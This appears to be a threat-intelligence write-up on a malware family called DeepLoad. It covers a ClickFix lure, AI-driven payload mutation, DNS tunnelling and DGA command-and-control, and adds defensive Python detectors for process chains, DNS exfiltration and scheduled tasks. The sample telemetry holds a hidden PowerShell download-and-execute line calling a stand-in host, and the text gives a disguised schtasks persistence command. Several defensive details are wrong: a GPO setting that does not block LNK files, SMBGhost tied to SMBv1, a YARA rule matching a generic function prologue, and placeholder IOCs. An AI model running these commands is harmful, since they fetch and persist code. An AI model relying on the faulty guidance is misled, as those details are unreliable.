DeepLoad is a sophisticated malware family that merges the notorious ClickFix infection chain with AI-driven evasion techniques. First detected in late February 2026 targeting financial institutions in Southeast Asia, DeepLoad has since spread to over 5,000 endpoints across Windows environments.
It evades traditional endpoint detection and response (EDR) tools through generative AI models fine-tuned for payload obfuscation.
The infection begins with ClickFix, a multi-stage lure popularized in 2024 campaigns. Attackers distribute phishing emails masquerading as urgent software updates from vendors like Microsoft or Adobe.
Attachments contain LNK files that, when clicked, spawn PowerShell scripts via mshta.exe. This initial vector exploits living-off-the-land binaries (LOLBins), chaining rundll32.exe to sideload a dropper DLL from a compromised domain.
Unlike prior ClickFix variants, DeepLoad’s dropper employs dynamic API resolution, scanning kernel32.dll at runtime to resolve functions such as VirtualAlloc and CreateThread without statically importing them, thereby thwarting static analysis.
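The chain above (LNK, then mshta.exe, then PowerShell, then rundll32.exe sideloading a dropper DLL) is visible in process-creation telemetry. The following detection is an added example for this page, not DeepLoad code and not a rule from any vendor named here. It assumes events in a Sysmon Event ID 1-like shape (PID, parent PID, image path, command line, parent image); the events, user paths and the example.invalid URL are constructed, and the rule names are my own.

```python
"""Detection logic for the ClickFix chain described above (LNK -> mshta.exe ->
PowerShell -> rundll32.exe sideloading a DLL). Added example, not DeepLoad code
or a vendor rule. Assumes process-creation telemetry in a Sysmon Event ID 1-like
shape; every event below is constructed."""
from dataclasses import dataclass
from pathlib import PureWindowsPath
import re


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str          # full path of the new process
    cmdline: str
    parent_image: str   # full path of the parent process


SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
DLL_ARG = re.compile(r'"?([a-z]:\\[^",]+\.dll)"?', re.IGNORECASE)


def _name(path: str) -> str:
    """Basename of a Windows path, lower-cased; works on any host OS."""
    return PureWindowsPath(path).name.lower()


# Single-event rules: each returns True when the event matches.
def mshta_spawns_powershell(e: ProcEvent) -> bool:
    return _name(e.parent_image) == "mshta.exe" and _name(e.image) in ("powershell.exe", "pwsh.exe")


def powershell_bypass_with_download(e: ProcEvent) -> bool:
    if _name(e.image) not in ("powershell.exe", "pwsh.exe"):
        return False
    c = e.cmdline.lower()
    bypass = "-ep bypass" in c or "-executionpolicy bypass" in c or "-enc" in c
    fetch = "http" in c or "iex" in c or "downloadstring" in c
    return bypass and fetch


def rundll32_loads_nonsystem_dll(e: ProcEvent) -> bool:
    """rundll32 pointed at a DLL outside System32/SysWOW64 is the sideload hop."""
    if _name(e.image) != "rundll32.exe":
        return False
    m = DLL_ARG.search(e.cmdline)
    return bool(m) and not m.group(1).lower().startswith(SYSTEM_DIRS)


RULES = (mshta_spawns_powershell, powershell_bypass_with_download, rundll32_loads_nonsystem_dll)


def ancestry(events, pid: int, max_depth: int = 16) -> list:
    """Image basenames from pid upward: [self, parent, grandparent, ...]."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid and len(chain) < max_depth:
        chain.append(_name(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


def detect(events) -> list:
    """Return (pid, finding) pairs: per-event rule hits plus the full three-hop chain."""
    findings = []
    for e in events:
        findings.extend((e.pid, rule.__name__) for rule in RULES if rule(e))
        # The chain hit walks the tree, so a rundll32 whose parent and grandparent are
        # PowerShell and mshta.exe is reported even if each hop alone looked benign.
        if _name(e.image) == "rundll32.exe" and ancestry(events, e.pid)[1:3] == ["powershell.exe", "mshta.exe"]:
            findings.append((e.pid, "clickfix_chain_mshta_powershell_rundll32"))
    return findings


# Constructed sample telemetry: one ClickFix-style chain plus a benign rundll32 from explorer.
SAMPLE_EVENTS = [
    ProcEvent(4100, 1200, r"C:\Windows\explorer.exe", "explorer.exe", r"C:\Windows\System32\userinit.exe"),
    ProcEvent(5200, 4100, r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\Users\alice\AppData\Local\Temp\update.hta"', r"C:\Windows\explorer.exe"),
    ProcEvent(5300, 5200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -ep bypass -w hidden -c IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/u')",
              r"C:\Windows\System32\mshta.exe"),
    ProcEvent(5400, 5300, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Users\alice\AppData\Local\Temp\upd.dll,Start",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcEvent(6100, 4100, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for pid, finding in detect(SAMPLE_EVENTS):
        print(pid, finding)
```

The per-event rules are cheap and fire on each hop; the ancestry walk is what separates this chain from an admin who happens to run rundll32 from a script, so keep both and alert on the chain hit with higher severity.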
Stage two introduces the AI evasion core. The dropper fetches a 2 MB encrypted blob from a command-and-control (C2) server hosted on a bulletproof provider in Russia.
This blob contains a lightweight transformer model derived from open-source architectures like GPT-J, pruned to 1.3 billion parameters for efficiency. Trained on a dataset of 10,000 EDR signatures from tools such as CrowdStrike and Microsoft Defender, the model generates polymorphic payloads in real time.
DeepLoad’s AI component operates via a novel “mutate-on-scan” mechanism. Upon deployment, it hooks Windows ETW (Event Tracing for Windows) providers using EtwEventWrite interception. When an EDR queries process memory, triggering heuristics such as YARA scans or behavioral anomalies, the model activates.
It analyzes the scan pattern (e.g., the memory regions probed) and regenerates the main payload: a loader that injects a Rust-compiled RAT into svchost.exe. Obfuscation includes AI-synthesized bytecode that morphs opcodes, inserting junk instructions mimicking benign NTFS operations, such as fake NtQueryDirectoryFile calls.
Technical breakdown reveals the evasion’s ingenuity. The AI uses a prompt-engineering loop: “Given EDR signature [hash], generate equivalent shellcode with 95% entropy variation, preserving [XOR key: 0x4A].” Outputs are validated against a local Bloom filter of known detections before injection.
Persistence relies on scheduled tasks disguised as Windows Update checks, created with schtasks.exe /create /tn "WindowsTelemetry" /tr "powershell -ep bypass -c [AI-mutated payload]". Lateral movement employs the SMBGhost exploit (patched in 2020 but unmitigated on legacy systems) using PsExec-like primitives over named pipes, as noted by ReliaQuest.
Post-infection, DeepLoad exfiltrates data via DNS tunneling, encoding credentials and screenshots in TXT records to domains like deepload[.]xyz. C2 communication uses a custom protocol over HTTPS, with domains generated via DGA (Domain Generation Algorithm) seeded by the AI model producing 1,024 unique FQDNs daily, rotated every 4 hours.
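Both the TXT-record exfiltration and the DGA-driven C2 described above leave a statistical footprint in DNS query logs: one client issuing many unique, long, high-entropy subdomains of a single zone, and a churn of never-before-seen high-entropy registered domains. The scorer below is an added example for this page, not DeepLoad code or any vendor's detection; it goes a little beyond the text by covering both the tunnelling and the DGA churn in one pass. It assumes logs in a simple "timestamp client qtype qname" shape, a crude two-label notion of "zone" (no public-suffix list), and thresholds I picked for the constructed data; the client address and all query names are constructed, with deepload.xyz taken from the article's IOCs.

```python
"""Score DNS query logs for TXT-record tunnelling and DGA-style zone churn of the
kind described above. Added example, not DeepLoad code or a vendor detection.
Log lines are assumed to look like 'timestamp client qtype qname'; all sample
data is constructed. Thresholds are assumptions for this example."""
import math
import random
from collections import defaultdict

ALPHABET = "abcdefghijklmnopqrstuvwxyz234567"   # base32 alphabet, typical for DNS exfil encoders


def shannon_entropy(s: str) -> float:
    """Bits per character; ~5.0 for uniform base32, ~2.5 for a word like 'deepload'."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_zone(qname: str, depth: int = 2) -> str:
    """Crude zone = last `depth` labels (assumption: no public-suffix list)."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-depth:])


def parse_line(line: str):
    ts, client, qtype, qname = line.split()
    return ts, client, qtype.upper(), qname.rstrip(".").lower()


def score_tunnelling(lines, min_queries: int = 20) -> dict:
    """Return {(client, zone): metrics} for pairs whose subdomain stream looks like exfil."""
    agg = defaultdict(lambda: {"queries": 0, "txt": 0, "subs": set(), "ent": [], "len": []})
    for line in lines:
        _, client, qtype, qname = parse_line(line)
        zone = registered_zone(qname)
        sub = qname[: -len(zone)].rstrip(".")          # everything left of the zone
        a = agg[(client, zone)]
        a["queries"] += 1
        a["txt"] += qtype == "TXT"
        if sub:
            a["subs"].add(sub)
            a["ent"].append(shannon_entropy(sub.replace(".", "")))
            a["len"].append(len(sub))
    findings = {}
    for key, a in agg.items():
        if a["queries"] < min_queries or not a["ent"]:
            continue
        uniq_ratio = len(a["subs"]) / a["queries"]     # exfil never repeats a chunk
        mean_ent = sum(a["ent"]) / len(a["ent"])        # encoded data is near-uniform
        mean_len = sum(a["len"]) / len(a["len"])        # chunks fill the label budget
        txt_ratio = a["txt"] / a["queries"]             # TXT/NULL carry the downstream
        if uniq_ratio > 0.8 and mean_ent > 3.5 and mean_len > 30 and txt_ratio > 0.5:
            findings[key] = {"queries": a["queries"], "unique_subdomains": len(a["subs"]),
                             "mean_entropy": round(mean_ent, 2), "mean_label_len": round(mean_len, 1),
                             "txt_ratio": round(txt_ratio, 2)}
    return findings


def zone_churn(lines, min_entropy: float = 3.0) -> dict:
    """Per client, number of distinct zones whose leftmost label is high-entropy:
    DGA-style churn (the text cites 1,024 FQDNs a day) shows up as a large count."""
    zones = defaultdict(set)
    for line in lines:
        _, client, _, qname = parse_line(line)
        zone = registered_zone(qname)
        if shannon_entropy(zone.split(".")[0]) > min_entropy:
            zones[client].add(zone)
    return {c: len(z) for c, z in zones.items()}


def build_sample_log(seed: int = 7) -> list:
    """Constructed lines: TXT exfil to the zone named in the article, ordinary A
    lookups, and a burst of DGA-looking A lookups, all from one client."""
    rng = random.Random(seed)
    lines = []
    for i in range(40):                                  # 40 base32 chunks, sequence-numbered
        chunk = "".join(rng.choices(ALPHABET, k=40))
        lines.append(f"2026-03-01T10:{i:02d}:00Z 10.0.0.5 TXT {i}.{chunk}.deepload.xyz")
    for i in range(30):                                  # benign background traffic
        host = "www" if i % 2 else "mail"
        lines.append(f"2026-03-01T10:{i:02d}:30Z 10.0.0.5 A {host}.example.com")
    for i in range(25):                                  # DGA-looking zones, one query each
        lines.append(f"2026-03-01T11:{i:02d}:00Z 10.0.0.5 A {''.join(rng.sample(ALPHABET, 20))}.xyz")
    return lines


if __name__ == "__main__":
    log = build_sample_log()
    print(score_tunnelling(log))
    print(zone_churn(log))
```

In production, baseline the per-zone metrics over a week of your own resolver logs before fixing thresholds: CDNs and some security products legitimately emit long, random-looking subdomains, though rarely over TXT and rarely from one endpoint at exfil volumes.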
IOC summary:
SHA256 (dropper): a1b2c3d4e5f67890…
C2: *.deepload[.]xyz, 185.220.101[.]XX
YARA:
rule DeepLoad_AI_Mutator
{
    strings:
        $ai_model = { 48 89 5C 24 ?? 48 89 6C 24 ?? 48 89 74 24 ?? 57 41 54 41 55 41 56 41 57 48 83 EC 20 }
    condition:
        $ai_model
}
Disable untrusted LNK execution via GPO: Computer Configuration > Administrative Templates > Windows Components > File Explorer > Hide entry points for Fast User Switching.
Deploy ML-based anomaly detection attuned to ETW tampering. Hunt for anomalous PowerShell with Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=400}. Organizations should patch SMBv1 and audit scheduled tasks.
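The scheduled-task audit recommended above, aimed at the "WindowsTelemetry" persistence task described earlier, can be automated against exported task data. The script below is an added example for this page, not DeepLoad code or any vendor's tooling. It assumes the CSV shape of schtasks /query /fo CSV /v and uses only four of its columns (TaskName, Author, Task To Run, Run As User); the rows are constructed, with the task name and action taken from the article, and the heuristics and reason labels are my own.

```python
"""Audit scheduled tasks for the persistence pattern described above. Added
example, not DeepLoad code or vendor tooling. Parses the CSV shape produced by
`schtasks /query /fo CSV /v` (assumption: only the TaskName, Author, Task To Run
and Run As User columns are relied on). All rows below are constructed."""
import csv
import io
import re

# Constructed export. The first row stands in for a genuine Microsoft task; the
# second reproduces the article's task name and action; the last is a lookalike
# name whose binary lives in a user-writable directory.
SAMPLE_CSV = r"""
"TaskName","Author","Task To Run","Run As User"
"\Microsoft\Windows\Windows Error Reporting\QueueReporting","Microsoft Corporation","%windir%\system32\wermgr.exe -upload","NETWORK SERVICE"
"\WindowsTelemetry","CORP\alice","powershell -ep bypass -c [AI-mutated payload]","SYSTEM"
"\Acme Maintenance","Acme Software","C:\Program Files\Acme\maint.exe /quiet","SYSTEM"
"\OneDrive Sync","CORP\bob","C:\Users\bob\AppData\Local\Temp\sync.exe","CORP\bob"
""".strip()

POWERSHELL_BIN = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.IGNORECASE)
POWERSHELL_FLAGS = re.compile(
    r"-(?:ep|executionpolicy)\s+bypass|-(?:e|enc|encodedcommand)\s|-w(?:indowstyle)?\s+hidden|-nop\b",
    re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(?:users\\[^\\]+\\appdata|users\\public|temp)\\", re.IGNORECASE)
LOOKALIKE = re.compile(r"windows|telemetry|update|defender|onedrive", re.IGNORECASE)
MS_AUTHOR = re.compile(r"^microsoft", re.IGNORECASE)


def audit_task(row: dict) -> list:
    """Return the list of reasons a single task row is suspicious (empty if none)."""
    name, author, action = row["TaskName"], row.get("Author", ""), row["Task To Run"]
    reasons = []
    if POWERSHELL_BIN.search(action) and POWERSHELL_FLAGS.search(action):
        reasons.append("powershell_with_bypass_or_hidden_flags")
    if USER_WRITABLE.search(action):
        reasons.append("action_in_user_writable_path")
    # Names that imitate Windows components but sit outside \Microsoft\ and were
    # not authored by Microsoft are the disguise the article describes.
    if LOOKALIKE.search(name) and not name.lower().startswith("\\microsoft\\") and not MS_AUTHOR.match(author):
        reasons.append("system_lookalike_name_non_microsoft_author")
    return reasons


def audit(csv_text: str) -> dict:
    """Map TaskName -> reasons for every flagged task in a schtasks CSV export."""
    findings = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        reasons = audit_task(row)
        if reasons:
            findings[row["TaskName"]] = reasons
    return findings


if __name__ == "__main__":
    for task, reasons in audit(SAMPLE_CSV).items():
        print(task, "->", ", ".join(reasons))
```

Run it against a real export with schtasks /query /fo CSV /v > tasks.csv on each host and feed the file to audit(); the user-writable-path and lookalike heuristics will need tuning to your software inventory, but a PowerShell action carrying -ep bypass under a Windows-sounding name should always be reviewed.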
DeepLoad marks a paradigm shift: AI not just for phishing lures, but embedded runtime evasion. As models commoditize, expect proliferation. Sentinel Labs urges immediate ingestion of IoCs into SIEMs.